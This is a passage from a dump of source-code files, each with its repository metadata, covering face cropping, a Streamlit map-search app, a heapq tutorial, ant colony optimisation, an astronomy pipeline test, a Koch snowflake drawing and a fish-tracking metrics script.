    def __cut_faces__(self, image):\r\n        faces = []\r\n        faces_coord = self.__detect__(image)\r\n        for (startX, startY, endX, endY) in faces_coord:\r\n            slicer = image[startY:endY, startX:endX]\r\n            if (len(slicer)):\r\n                faces.append(slicer)\r\n\r\n        return faces\r\n\r\n    def __resize__(self, images, size=(224, 224)):\r\n        images_norm = []\r\n        for image in images:\r\n            if image.shape < size:\r\n                image_norm = cv2.resize(image, size,\r\n                                        interpolation=cv2.INTER_AREA)\r\n            else:\r\n                image_norm = cv2.resize(image, size,\r\n                                        interpolation=cv2.INTER_CUBIC)\r\n            images_norm.append(image_norm)\r\n\r\n        return images_norm\r\n\r\n    def normalize_faces(self, image):\r\n        faces = self.__cut_faces__(image)\r\n        faces = self.__resize__(faces, (150, 150))\r\n\r\n        return faces","repo_name":"julardos/StudentsAttendance","sub_path":"normalize.py","file_name":"normalize.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"35648370398","text":"import datetime\nimport os\nfrom enum import Enum\nfrom typing import Dict, List\n\nimport pandas as pd\nimport streamlit as st\nfrom google_map_analyzer import PlaceType, run_search_api\n\nst.set_page_config(layout=\"wide\")\n\n\n# --- Daily search-count limit\nDATA_FILE = \"button_data.txt\"\nSEARCH_LIMIT = 15\n\n\ndef read_data():\n    if not os.path.exists(DATA_FILE):\n        return 0, None\n\n    with open(DATA_FILE, \"r\") as f:\n        lines = f.readlines()\n        count = int(lines[0].strip())\n        last_date = datetime.datetime.strptime(lines[1].strip(), \"%Y-%m-%d\").date()\n    return count, last_date\n\n\ndef write_data(count, date):\n    with open(DATA_FILE, \"w\") as f:\n        f.write(str(count) + \"\\n\")\n        f.write(date.strftime(\"%Y-%m-%d\"))\n\n\ncount, last_date = read_data()\ntoday = datetime.date.today()\n\nif last_date is None or last_date != today:\n    count = 0\n# ---\n\n\nlink_css = \"\"\"\n    \n\"\"\"\nst.write(link_css, unsafe_allow_html=True)\n\n\nst.title(\"SNS Search\")\n\nkeyword = st.text_input(\"Enter a keyword\", \"ramen\")\nlocation = st.text_input(\"Enter a location\", value=\"Sendai Station\")\nradius = st.slider(\"Select a search radius (m)\", min_value=1, max_value=10000, value=1000)\n\ntype_list = list(PlaceType)\ntype_list.append(\"Not specified\")\nshop_type = st.selectbox(\n    \"Select a type\",\n    type_list,\n    index=type_list.index(\"Not specified\"),\n)\nsns_only = st.checkbox(\"Only shops with SNS accounts\")\n\n# Check if session state is already initialized\nif \"results\" not in st.session_state:\n    st.session_state[\"results\"] = pd.DataFrame()\n\nsearch_col, download_col = st.columns([1, 1])  # set up the columns\n\n\nif (\n    search_col.button(\"Search\", disabled=not (count < SEARCH_LIMIT))\n    and count < SEARCH_LIMIT\n):\n    results = run_search_api(keyword, location, radius, limit=5, _type=shop_type)\n    results = [result for result in results if result[\"sns\"] or not sns_only]\n\n    # Prepare results for DataFrame\n    formatted_results = []\n    for result in results:\n        details = result[\"details\"][\"result\"]\n        formatted_result = {\n            \"name\": result[\"name\"],\n            \"google_map_url\": result[\"google_map_url\"],\n            \"phone\": details.get(\"formatted_phone_number\", \"\"),\n            \"rating\": details.get(\"rating\", \"\"),\n            \"website\": details.get(\"website\", \"\"),\n            \"sns\": \"\\n\".join(result[\"sns\"]) if result[\"sns\"] else \"\",\n        }\n        formatted_results.append(formatted_result)\n\n    # Update session state\n    st.session_state[\"results\"] = pd.DataFrame(formatted_results)\n\n    # Count this search against the daily limit\n    count += 1\n    write_data(count, today)\n
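\n# button_data.txt persists the quota as two lines (count, then ISO date), e.g.\n#   3\n#   2023-09-18\n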
\nif count >= SEARCH_LIMIT:\n    st.warning(\"You have reached today's limit of button presses.\")\nelse:\n    remaining = SEARCH_LIMIT - count\n    st.info(f\"Presses remaining today: {remaining} / {SEARCH_LIMIT}\")\n\n\n# Display results\nfor index, result in st.session_state[\"results\"].iterrows():\n    st.subheader(result[\"name\"])\n    col1, col2 = st.columns(2)\n    with col1:\n        st.write(f\"[Google Map]({result['google_map_url']})\")\n        st.markdown(f\"**Phone**: {result['phone']}\")\n        st.markdown(f\"**Rating**: {result['rating']}\")\n    with col2:\n        st.markdown(f\"**Website**: [{result['website']}]({result['website']})\")\n        if result[\"sns\"] != \"\":\n            icons = \"\"\n            for sns in result[\"sns\"].split(\"\\n\"):\n                if \"instagram.\" in sns:\n                    icons += (\n                        f' '\n                    )\n                elif \"twitter.\" in sns:\n                    icons += (\n                        f' '\n                    )\n                elif \"tiktok.\" in sns:\n                    icons += f' '\n                elif \"facebook.\" in sns:\n                    icons += (\n                        f' '\n                    )\n                elif \"line.\" in sns:\n                    icons += f' '\n            st.markdown(icons, unsafe_allow_html=True)\n\ncsv = st.session_state[\"results\"].to_csv(index=False)\n\ndownload_col.download_button(\n    label=\"Save results as CSV\",\n    data=csv,\n    file_name=\"shop_search_results.csv\",\n    mime=\"text/csv\",\n)\n","repo_name":"TomoyaFujita2016/google-map-analyzer","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18704230028","text":"import heapq\n\n'''\nTwo ways to build a heap:\n- heappush one by one\n- heapify\n'''\n# 1\nnums = [2, 3, 5, 1, 54, 23, 132]\nheap = []\nfor num in nums:\n    heapq.heappush(heap, num)\n# peek at the smallest value without popping\nprint(heap[0])\n\n# 2\nnums = [2, 3, 5, 1, 54, 23, 132]\nheapq.heapify(nums)  # nums is rearranged in place\n\n'''\nheappop\n'''\n# pop the smallest value each time\nfor i in range(len(nums)):\n    print(heapq.heappop(nums))\nprint(nums)\n\n'''\nmerge\n'''\nnums1 = [1, 2, 3, 4, 5]  # must already be sorted\nnums2 = [3, 4, 5, 6, 7]  # must already be sorted\n# returns an iterator over the merged values\nnums = heapq.merge(nums1, nums2)\nprint(list(nums))\n\n'''\nreplace\n'''\nnums = [2, 3, 5, 1, 54, 23, 132]\nheapq.heapify(nums)  # heapreplace expects a heap, so heapify first\n# pop the smallest element and push a new one in a single call\nheapq.heapreplace(nums, 233)\nprint(nums)\n\n'''\nnlargest\nnsmallest\n'''\nnums = [2, 3, 5, 1, 54, 23, 132]\n# the three largest / three smallest values\nprint(heapq.nlargest(3,nums))\nprint(heapq.nsmallest(3,nums))\n\n'''\nPython's heapq module does not itself support a custom comparison function\n(the functools.cmp_to_key trick cannot be used here),\nbut a custom ordering can be supplied by overriding the object's __lt__ method.\n'''\n# if the class can be edited directly\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n    def __lt__(self, other):\n        return self.val < other.val\n\n# if the class cannot be edited directly, patch __lt__ on afterwards\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\ndef __lt__(self, other):\n    return self.val < other.val\nListNode.__lt__=__lt__\n
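\n# usage sketch: with __lt__ defined, ListNode objects can be heapified directly\nnodes = [ListNode(3), ListNode(1), ListNode(2)]\nheapq.heapify(nodes)\nprint(nodes[0].val)  # -> 1\n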
","repo_name":"RoryDoctective/LeetCode","sub_path":"Python学习/heapq_learn.py","file_name":"heapq_learn.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36131085674","text":"from random import random\nfrom time import time\nfrom itertools import repeat\nfrom matplotlib import pyplot as plt\n\nfrom models.graph import Graph\nfrom models.ant import Ant\n\n\nclass ACO(object):\n    \"\"\"This class holds all relevant information for objects required for running the ACO algorithm.\n\n    ...\n\n    Attributes\n    ----------\n    bins : array(Bin)\n        an array of bin objects, each holding items and a total weight.\n    items : array(int)\n        an array of integers representing the weights of items.\n    ants : array(Ant)\n        an array of Ant objects to be controlled during the algorithm's run.\n    best_ant : Ant\n        an ant object - the best ant of the final generation of an algorithm run.\n    graph : Graph\n        a graph object to store the pheromone weights.\n    num_paths : int\n        the number of routes evaluated.\n    limit : int\n        the maximum number of evaluations allowed.\n    verbose : boolean\n        whether or not to print to the console when log() is called.\n    ran : boolean\n        has the ACO been run.\n    runtime : float\n        time duration of the last run.\n    avg_fits : array(float)\n        the timeseries of average fitnesses over each cycle.\n    best_fits : array(float)\n        the timeseries of the best fitness (normalised by total item weight) for each cycle.\n\n    Methods\n    -------\n    summary()\n        prints a summary of the last run if there is one.\n    stats()\n        returns the best fitness and time elapsed over last run if there is one.\n    run()\n        runs the ACO algorithm.\n    explore()\n        runs one cycle of route creation and evaporation.\n    ant_run(ant)\n        reset the ant and recreate its route.\n    create_route(ant)\n        create a route through the graph of pheromones.\n    route_step(prev_bin, item)\n        return a step from the current bin to the next bin position.\n    route_fitness()\n        calculate the fitness for the current bin configuration.\n    set_champion()\n        set the best ant for the current generation.\n    empty_bins()\n        reset all bins.\n    log(message)\n        prints to the console if verbose is true.\n    graph_averages()\n        create a graph using the data from avg_fits.\n    \"\"\"\n\n    def __init__(self, bins, items, population, evaporation_rate, limit=10000, verbose=False):\n        \"\"\"Initialise the ACO object with the required parameters.\"\"\"\n        self.bins = bins\n        self.items = items\n\n        self.ants = [Ant() for _ in range(population)]\n        self.best_ant = None\n\n        self.graph = Graph(len(bins), len(items), evaporation_rate)\n\n        self.num_paths = 0\n        self.limit = limit\n        self.verbose = verbose\n\n        self.ran = False\n        self.runtime = 0\n\n        self.avg_fits = []\n\n    def summary(self):\n        \"\"\"Print a summary of the last run if there is one.\"\"\"\n        if hasattr(self, 'ran') and self.ran:\n            print(\"Run was successful and took %d seconds.\" % int(self.runtime))\n            print(\"--- Best fitness: %d\" % self.best_ant.fitness)\n            print(\"--- Best bin config:\")\n            for i, b in enumerate(self.best_ant.bins):\n                print(\"%4d. %s\" % (i + 1, b))\n\n    def stats(self):\n        \"\"\"Return the best fitness achieved in the final generation and the time taken to run the ACO\"\"\"\n        if hasattr(self, 'ran') and self.ran:\n            return self.best_ant.fitness, self.runtime\n\n    def run(self):\n        \"\"\"Runs a full ACO run.\"\"\"\n        self.log(\"--- Starting ACO Run ---\")\n        self.ran = False\n        self.best_fits = []\n        self.avg_fits = []\n        start_time = time()\n\n        while self.num_paths < self.limit:\n            self.explore()\n\n        self.set_champion()\n\n        self.ran = True\n        self.runtime = time() - start_time\n\n    def explore(self):\n        \"\"\"Create a route for all ants and evaporate the graph.\"\"\"\n        self.ants = [*map(self.ant_run, self.ants)]\n        best = None\n        for ant in self.ants:\n            ant.lay_pheromones(self.graph)\n        fitnesses = [ant.fitness for ant in self.ants]\n        self.best_fits.append(min(fitnesses) / sum(self.items))\n        self.avg_fits.append(sum(fitnesses) / len(fitnesses))\n        self.graph.evaporate()\n\n    def ant_run(self, ant):\n        \"\"\"Reset the bins and create a route for the given ant.\"\"\"\n        self.empty_bins()\n        ant = self.create_route(ant)\n        ant.bins = self.bins.copy()\n        return ant\n\n    def create_route(self, ant):\n        \"\"\"Calculate a route through the pheromone graph.\"\"\"\n        prev_bin = 0\n        ant.route = []\n        for item in enumerate(self.items):\n            prev_bin, item = self.route_step(prev_bin, item)\n            ant.route.append((prev_bin, item))\n\n        ant.fitness = self.route_fitness()\n\n        self.num_paths += 1\n\n        return ant\n\n    def route_step(self, prev_bin, item):\n        \"\"\"Get the index of the next bin to place the item in.\"\"\"\n        column = self.graph.graph[prev_bin][item[0]].tolist()\n        total = sum(column)\n        threshold = total * random()\n\n        current = 0.0\n        for index, weight in enumerate(column):\n            if current + weight >= threshold:\n                self.bins[index].add_item(item[1])\n                return index, item[0]\n            current += weight\n\n    def route_fitness(self):\n        \"\"\"Calculate the fitness of the current bin configuration.\"\"\"\n        max_weight = self.bins[0].total_weight\n        min_weight = self.bins[0].total_weight\n        for b in self.bins:\n            if 
b.total_weight > max_weight:\n max_weight = b.total_weight\n if b.total_weight < min_weight:\n min_weight = b.total_weight\n\n return max_weight - min_weight\n\n def set_champion(self):\n \"\"\"Allocate the best ant of the generation to the best_ant.\"\"\"\n for ant in self.ants:\n if self.best_ant and ant.fitness < self.best_ant.fitness:\n self.best_ant = ant.copy()\n elif not self.best_ant:\n self.best_ant = ant.copy()\n\n def empty_bins(self):\n \"\"\"Resets the bin configuration.\"\"\"\n [b.empty() for b in self.bins]\n\n def log(self, message):\n \"\"\"Prints a message to the console if verbose is true.\"\"\"\n if self.verbose:\n print(message)\n\n def graph_averages(self):\n \"\"\"Output a graph to the user based on the values in avg_fits\"\"\"\n plt.plot(self.avg_fits)\n plt.show()\n\n\nif __name__ == '__main__':\n from models.bins import generate_bins\n from models.items import generate_items\n\n bins = generate_bins(10)\n items = generate_items(quantity=200)\n population = 10\n evaporation_rate = 0.4\n\n trial = ACO(bins, items, population, evaporation_rate, verbose=True)\n trial.run()\n trial.graph_averages()\n","repo_name":"MitchSRobinson/AntColonyOptimisation","sub_path":"aco.py","file_name":"aco.py","file_ext":"py","file_size_in_byte":6678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"776735697","text":"import os\nimport unittest\n\nimport lsst.utils.tests\n\nfrom lsst.ci.hsc.gen3 import PSF_MODEL_ROBUSTNESS_FAILURE_DATA_IDS\nfrom lsst.daf.butler import Butler, DataCoordinate\nfrom lsst.utils import getPackageDir\n\n\nclass TestPsfModelTraceRadiusFails(lsst.utils.tests.TestCase):\n \"\"\"Test the deselection of detectors based on PSF model robustness check.\n \"\"\"\n def setUp(self):\n self.butler = Butler(os.path.join(getPackageDir(\"ci_hsc_gen3\"), \"DATA\"), writeable=False,\n collections=[\"HSC/calib/2013-06-17\", \"HSC/runs/ci_hsc\"])\n self.skymap = \"discrete/ci_hsc\"\n self.tract = 0\n self.patch = 69\n self.band = \"r\"\n self.coaddDataId = DataCoordinate.standardize(\n instrument=\"HSC\", skymap=self.skymap, tract=self.tract, patch=self.patch, band=self.band,\n universe=self.butler.dimensions,\n )\n\n def tearDown(self):\n del self.butler\n del self.skymap\n del self.tract\n del self.patch\n del self.band\n del self.coaddDataId\n\n def testFailedPsfTraceRadiusDeltaNotInCoadd(self):\n \"\"\"Check that the detectors failing the maxPsfTraceRadiusDelta\n criterion are not included in the coadd.\n \"\"\"\n coadd = self.butler.get(\"deepCoadd_calexp\", self.coaddDataId)\n inputCcds = coadd.getInfo().getCoaddInputs().ccds\n for failedDataId in PSF_MODEL_ROBUSTNESS_FAILURE_DATA_IDS:\n visit = failedDataId[\"visit\"]\n detector = failedDataId[\"detector\"]\n failedMask = (inputCcds[\"visit\"] == visit) & (inputCcds[\"ccd\"] == detector)\n self.assertTrue(sum(failedMask) == 0)\n\n\nclass MemoryTester(lsst.utils.tests.MemoryTestCase):\n pass\n\n\nif __name__ == \"__main__\":\n lsst.utils.tests.init()\n unittest.main()\n","repo_name":"lsst/ci_hsc_gen3","sub_path":"tests/test_psfModelTraceFail.py","file_name":"test_psfModelTraceFail.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"8737540456","text":"from turtle import forward, left, right, speed, exitonclick, setpos, penup, pendown\n\nspeed(0)\npenup()\nsetpos(-200, 200)\npendown()\n\ndef vlocka(a, u):\n if (u == 0):\n forward(a)\n return\n vlocka(a/3, u-1)\n 
left(60)\n vlocka(a/3, u-1)\n right(120)\n vlocka(a/3, u-1)\n left(60)\n vlocka(a/3, u-1)\n\n#vlocka(120,3)\n\nfor _ in range(3):\n vlocka(500,4)\n right(120)\n\nexitonclick()\n","repo_name":"krskovape/programovani","sub_path":"cv_10/kochova_vločka.py","file_name":"kochova_vločka.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4096852150","text":"import os\r\nimport re\r\nimport argparse\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\n\r\nclass BackFiller:\r\n def __init__(self, approach_radius, frame_rate, result_folder, dims_x, ratio_pixmm,\r\n frame_file=None, window_size=10):\r\n self.size_ratio = ratio_pixmm * (480 / dims_x)\r\n\r\n self.approach_radius = approach_radius\r\n self.frame_rate = frame_rate\r\n self.window_size = window_size\r\n\r\n self.frame_file = frame_file\r\n if self.frame_file is not None:\r\n self.frame_snips = {}\r\n self._parse_frames(self.frame_file)\r\n\r\n self.sum_file = pd.DataFrame(\r\n columns=[\r\n \"Subject\",\r\n \"Duration in radius - left-facing\",\r\n \"Duration in radius - right-facing\",\r\n \"Duration outside radius - left-facing\",\r\n \"Duration outside radius - right-facing\",\r\n \"Left approaches\",\r\n \"Right approaches\",\r\n ]\r\n )\r\n\r\n @staticmethod\r\n def _comp_helper(vals, targ):\r\n for v in vals:\r\n if v != targ:\r\n return False\r\n return True\r\n\r\n def _parse_frames(self, source):\r\n with open(source, \"r\") as f:\r\n\r\n for idx, line in enumerate(f):\r\n\r\n # row specifying video name\r\n if idx % 3 == 0:\r\n vname = line.strip()\r\n self.frame_snips[vname] = {\"l_fish\": None, \"r_fish\": None}\r\n\r\n # row specifying left fish frames\r\n elif (idx - 1) % 3 == 0:\r\n delin = line.split(\" \")\r\n self.frame_snips[vname][\"l_fish\"] = [\r\n int(delin[0]), int(delin[1])]\r\n\r\n elif (idx - 2) % 3 == 0:\r\n delin = line.split(\" \")\r\n self.frame_snips[vname][\"r_fish\"] = [\r\n int(delin[0]), int(delin[1])]\r\n\r\n def _get_distance(self, x1, y1, x2, y2):\r\n return np.sqrt(np.square(x1 - x2) + np.square(y1 - y2)) / self.size_ratio\r\n\r\n def _is_left_facing(self, row, side_prefix):\r\n\r\n # which side of fish faces rod\r\n left_d = self._get_distance(\r\n row[f\"{side_prefix}head_l\"][0],\r\n row[f\"{side_prefix}head_l\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n right_d = self._get_distance(\r\n row[f\"{side_prefix}head_r\"][0],\r\n row[f\"{side_prefix}head_r\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n if left_d < right_d:\r\n return 1\r\n\r\n return 0\r\n\r\n def _is_in_radius(self, row, side_prefix):\r\n\r\n # which side of fish (if any) crosses approach-radius\r\n left_d = self._get_distance(\r\n row[f\"{side_prefix}head_l\"][0],\r\n row[f\"{side_prefix}head_l\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n right_d = self._get_distance(\r\n row[f\"{side_prefix}head_r\"][0],\r\n row[f\"{side_prefix}head_r\"][1],\r\n row[f\"{side_prefix}rod\"][0],\r\n row[f\"{side_prefix}rod\"][1],\r\n )\r\n\r\n if left_d < self.approach_radius or right_d < self.approach_radius:\r\n return 1\r\n\r\n return 0\r\n\r\n def _get_metrics(self, filled_df, save_dir):\r\n\r\n out_df = pd.DataFrame(\r\n columns=[\r\n \"frame_idx\",\r\n \"l_in_radius\",\r\n \"l_left_approaches\",\r\n \"l_right_approaches\",\r\n \"l_in_time\",\r\n \"l_out_time\",\r\n \"l_in_left_time\",\r\n 
\"l_in_right_time\",\r\n \"l_out_left_time\",\r\n \"l_out_right_time\",\r\n \"l_left_head\",\r\n \"l_right_head\",\r\n \"l_center_head\",\r\n \"l_rod\",\r\n \"l_coords_filled\",\r\n \"r_in_radius\",\r\n \"r_left_approaches\",\r\n \"r_right_approaches\",\r\n \"r_in_time\",\r\n \"r_out_time\",\r\n \"r_in_left_time\",\r\n \"r_in_right_time\",\r\n \"r_out_left_time\",\r\n \"r_out_right_time\",\r\n \"r_left_head\",\r\n \"r_right_head\",\r\n \"r_center_head\",\r\n \"r_rod\",\r\n \"r_coords_filled\",\r\n ]\r\n )\r\n\r\n left_in_radius = False\r\n\r\n left_fish = {\r\n \"in_time\": 0,\r\n \"out_time\": 0,\r\n \"in_facing_left\": 0,\r\n \"in_facing_right\": 0,\r\n \"out_facing_left\": 0,\r\n \"out_facing_right\": 0,\r\n \"left_approach\": 0,\r\n \"right_approach\": 0,\r\n \"distance\": 0,\r\n }\r\n\r\n right_in_radius = False\r\n\r\n right_fish = {\r\n \"in_time\": 0,\r\n \"out_time\": 0,\r\n \"in_facing_left\": 0,\r\n \"in_facing_right\": 0,\r\n \"out_facing_left\": 0,\r\n \"out_facing_right\": 0,\r\n \"left_approach\": 0,\r\n \"right_approach\": 0,\r\n \"distance\": 0,\r\n }\r\n\r\n l_approach_duration = 0\r\n l_side_buffer = None\r\n r_approach_duration = 0\r\n r_side_buffer = None\r\n left_cols = [col for col in filled_df.columns if col.startswith(\"l\")]\r\n right_cols = [col for col in filled_df.columns if col.startswith(\"r\")]\r\n vid_key = save_dir.split(\"/\")[-2]\r\n\r\n if self.frame_file is not None:\r\n l_snip = self.frame_snips[vid_key][\"l_fish\"]\r\n l_idx_list = [i for i in range(l_snip[0], l_snip[1] + 1)]\r\n r_snip = self.frame_snips[vid_key][\"r_fish\"]\r\n r_idx_list = [i for i in range(r_snip[0], r_snip[1] + 1)]\r\n\r\n fill_row = [-1] * 9 + [[-1, -1]] * 4 + [-1]\r\n df_idx = -1\r\n\r\n for idx, frame in filled_df.iterrows():\r\n if self.frame_file is None or idx in l_idx_list + r_idx_list:\r\n df_idx += 1\r\n row = [idx]\r\n petri1 = frame.loc[left_cols]\r\n petri2 = frame[right_cols]\r\n\r\n # LEFT FISH\r\n # fish was in radius in previous frame\r\n if self.frame_file is None or idx in l_idx_list:\r\n if left_in_radius:\r\n if self._is_in_radius(petri1, \"l\") == 0:\r\n left_in_radius = False\r\n l_approach_duration = 0\r\n left_fish[\"out_time\"] += 1\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n left_fish[\"out_facing_left\"] += 1\r\n else:\r\n left_fish[\"out_facing_right\"] += 1\r\n\r\n else:\r\n left_fish[\"in_time\"] += 1\r\n l_approach_duration += 1\r\n\r\n if l_approach_duration == self.frame_rate // 2:\r\n if l_side_buffer == \"left\":\r\n left_fish[\"left_approach\"] += 1\r\n elif l_side_buffer == \"right\":\r\n left_fish[\"right_approach\"] += 1\r\n l_side_buffer = None\r\n\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n left_fish[\"in_facing_left\"] += 1\r\n else:\r\n left_fish[\"in_facing_right\"] += 1\r\n\r\n # fish wasn't in radius in previous frame\r\n else:\r\n if self._is_in_radius(petri1, \"l\") == 1:\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n l_side_buffer = \"left\"\r\n l_approach_duration += 1\r\n left_fish[\"in_time\"] += 1\r\n left_fish[\"in_facing_left\"] += 1\r\n left_in_radius = True\r\n\r\n else:\r\n l_side_buffer = \"right\"\r\n left_fish[\"in_time\"] += 1\r\n left_fish[\"in_facing_right\"] += 1\r\n left_in_radius = True\r\n\r\n else:\r\n left_fish[\"out_time\"] += 1\r\n l_approach_duration = 0\r\n if self._is_left_facing(petri1, \"l\") == 1:\r\n left_fish[\"out_facing_left\"] += 1\r\n else:\r\n left_fish[\"out_facing_right\"] += 1\r\n\r\n row.append(int(left_in_radius))\r\n row.append(left_fish[\"left_approach\"])\r\n 
row.append(left_fish[\"right_approach\"])\r\n row.append(\r\n round(left_fish[\"in_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"out_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"in_facing_left\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"in_facing_right\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"out_facing_left\"] / self.frame_rate, 2))\r\n row.append(\r\n round(left_fish[\"out_facing_right\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(petri1.loc[\"lhead_l\"]) # head l\r\n row.append(petri1.loc[\"lhead_r\"]) # head r\r\n row.append(petri1.loc[\"lhead_c\"]) # head c\r\n row.append(petri1.loc[\"lrod\"]) # rod\r\n row.append(petri1.loc[\"l_filled\"])\r\n\r\n else:\r\n row += fill_row\r\n\r\n # RIGHT FISH\r\n # fish was in radius in previous frame\r\n if self.frame_file is None or idx in r_idx_list:\r\n if right_in_radius:\r\n if self._is_in_radius(petri2, \"r\") == 0:\r\n right_in_radius = False\r\n r_approach_duration = 0\r\n right_fish[\"out_time\"] += 1\r\n\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n right_fish[\"out_facing_left\"] += 1\r\n else:\r\n right_fish[\"out_facing_right\"] += 1\r\n\r\n else:\r\n right_fish[\"in_time\"] += 1\r\n r_approach_duration += 1\r\n\r\n if r_approach_duration == self.frame_rate // 2:\r\n if r_side_buffer == \"left\":\r\n right_fish[\"left_approach\"] += 1\r\n elif r_side_buffer == \"right\":\r\n right_fish[\"right_approach\"] += 1\r\n r_side_buffer = None\r\n\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n right_fish[\"in_facing_left\"] += 1\r\n\r\n else:\r\n right_fish[\"in_facing_right\"] += 1\r\n if (\r\n self._comp_helper(petri2.rhead_l, -1)\r\n or self._comp_helper(petri2.rhead_r, -1)\r\n or self._comp_helper(petri2.rhead_c, -1)\r\n or self._comp_helper(petri2.rtail, -1)\r\n or self._comp_helper(petri2.rrod, -1)\r\n ):\r\n r_approach_duration -= 1\r\n right_fish[\"in_time\"] -= 1\r\n right_fish[\"in_facing_right\"] -= 1\r\n\r\n # fish wasn't in radius in previous frame\r\n else:\r\n if self._is_in_radius(petri2, \"r\") == 1:\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n r_side_buffer = \"left\"\r\n r_approach_duration += 1\r\n right_fish[\"in_time\"] += 1\r\n right_fish[\"in_facing_left\"] += 1\r\n right_in_radius = True\r\n\r\n else:\r\n r_side_buffer = \"right\"\r\n right_fish[\"in_time\"] += 1\r\n right_fish[\"in_facing_right\"] += 1\r\n right_in_radius = True\r\n\r\n else:\r\n right_fish[\"out_time\"] += 1\r\n r_approach_duration = 0\r\n if self._is_left_facing(petri2, \"r\") == 1:\r\n right_fish[\"out_facing_left\"] += 1\r\n else:\r\n right_fish[\"out_facing_right\"] += 1\r\n\r\n if (\r\n self._comp_helper(petri2.rhead_l, -1)\r\n or self._comp_helper(petri2.rhead_r, -1)\r\n or self._comp_helper(petri2.rhead_c, -1)\r\n or self._comp_helper(petri2.rtail, -1)\r\n or self._comp_helper(petri2.rrod, -1)\r\n ):\r\n r_approach_duration -= 1\r\n right_fish[\"in_time\"] -= 1\r\n right_fish[\"right_approach\"] -= 1\r\n right_fish[\"in_facing_right\"] -= 1\r\n\r\n row.append(int(right_in_radius))\r\n row.append(right_fish[\"left_approach\"])\r\n row.append(right_fish[\"right_approach\"])\r\n row.append(\r\n round(right_fish[\"in_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(right_fish[\"out_time\"] / self.frame_rate, 2))\r\n row.append(\r\n round(right_fish[\"in_facing_left\"] / self.frame_rate, 2))\r\n row.append(\r\n round(right_fish[\"in_facing_right\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(\r\n 
round(right_fish[\"out_facing_left\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(\r\n round(right_fish[\"out_facing_right\"] /\r\n self.frame_rate, 2)\r\n )\r\n row.append(petri2.loc[\"rhead_l\"]) # head l\r\n row.append(petri2.loc[\"rhead_r\"]) # head r\r\n row.append(petri2.loc[\"rhead_c\"]) # head c\r\n row.append(petri2.loc[\"rrod\"]) # rod\r\n row.append(petri2.loc[\"r_filled\"])\r\n\r\n else:\r\n row += fill_row\r\n\r\n out_df.loc[df_idx] = row\r\n\r\n l_dist = 0\r\n r_dist = 0\r\n l_pos = None\r\n r_pos = None\r\n\r\n for row_idx in range(out_df.shape[0]):\r\n if row_idx == 0:\r\n l_pos = out_df.loc[row_idx, \"l_center_head\"]\r\n r_pos = out_df.loc[row_idx, \"r_center_head\"]\r\n\r\n else:\r\n tmp = out_df.loc[row_idx, \"l_center_head\"]\r\n l_dist += self._get_distance(l_pos[0],\r\n l_pos[1], tmp[0], tmp[1])\r\n l_pos = tmp.copy()\r\n tmp = out_df.loc[row_idx, \"r_center_head\"]\r\n r_dist += self._get_distance(r_pos[0],\r\n r_pos[1], tmp[0], tmp[1])\r\n r_pos = tmp.copy()\r\n\r\n left_fish[\"distance\"] = l_dist\r\n right_fish[\"distance\"] = r_dist\r\n out_df.to_csv(save_dir + \"backfilled_results.csv\", index=False)\r\n return left_fish, right_fish\r\n\r\n def _roll_mean(self, col):\r\n results = []\r\n assert col.shape[0] > self.window_size + 1\r\n win_range = (self.window_size // 2)\r\n for i in range(col.shape[0]):\r\n # start\r\n if i == 0:\r\n x_coord = np.mean(col[1:i + 1 + win_range, 0])\r\n y_coord = np.mean(col[1:i + 1 + win_range, 1])\r\n results.append([x_coord, y_coord])\r\n\r\n # not start but still too close to start for full backwards sliding window\r\n elif i < win_range:\r\n x_coord = (\r\n np.mean(col[:i, 0]) + np.mean(col[i + 1:i + 1 + win_range, 0])) / 2\r\n y_coord = (\r\n np.mean(col[:i, 1]) + np.mean(col[i + 1:i + 1 + win_range, 1])) / 2\r\n results.append([x_coord, y_coord])\r\n\r\n # end\r\n elif i == col.shape[0] - 1:\r\n x_coord = np.mean(col[i - win_range:, 0])\r\n y_coord = np.mean(col[i - win_range:, 1])\r\n results.append([x_coord, y_coord])\r\n\r\n # not end but too close for full forward sliding window\r\n # need to add +1 here because right side of list slice is exclusive index\r\n elif i + 1 + win_range > col.shape[0] - 1:\r\n x_coord = (np.mean(col[i - win_range:i, 0]\r\n ) + np.mean(col[i + 1:, 0])) / 2\r\n y_coord = (np.mean(col[i - win_range:i, 1]\r\n ) + np.mean(col[i + 1:, 1])) / 2\r\n results.append([x_coord, 